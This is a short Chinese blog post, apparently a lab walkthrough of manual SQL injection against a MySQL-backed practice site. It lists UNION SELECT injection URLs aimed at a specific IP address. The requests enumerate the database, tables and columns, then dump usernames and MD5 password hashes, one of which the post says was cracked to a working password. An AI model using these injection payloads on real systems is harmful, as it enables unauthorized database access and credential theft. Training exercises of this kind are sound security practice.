SQL手工注入漏洞測驗(MySQL資料庫) 的靶場練習 流程與方法
注意:加粗部分給重點
查詢資料庫名
http://219.153.49.228:46939/new_list.php?id=22 union select 1,database(),3,4 from information_schema.tables
獲取到的庫名
mozhe_Discuz_StormGroup
查詢庫下的表名
http://219.153.49.228:46939/new_list.php?id=-5 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'
獲取到的表名
StormGroup_member,notice
查詢表下的欄位
http://219.153.49.228:46939/new_list.php?id=-5 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member'
獲取到的欄位名
id,name,password,status
查詢資料
http://219.153.49.228:46939/new_list.php?id=-5 union select 1,group_concat(id,0x5c,name,0x5c,password,0x5c,status),3,4 from StormGroup_member
?得到的資料(ox5c為 \ 的16進制)
1\mozhe\356f589a7df439f6f744ff19bb8092c0\0,1\mozhe\4adef249540a3cb5d79c85f6ccc7ddb9\1
MD5解密得到密碼,經過測驗有可用
4adef249540a3cb5d79c85f6ccc7ddb9
946377
轉載請註明出處,本文鏈接:https://www.uj5u.com/shujuku/114642.html
標籤:MySQL
上一篇:mysql初識
下一篇:day 34 作業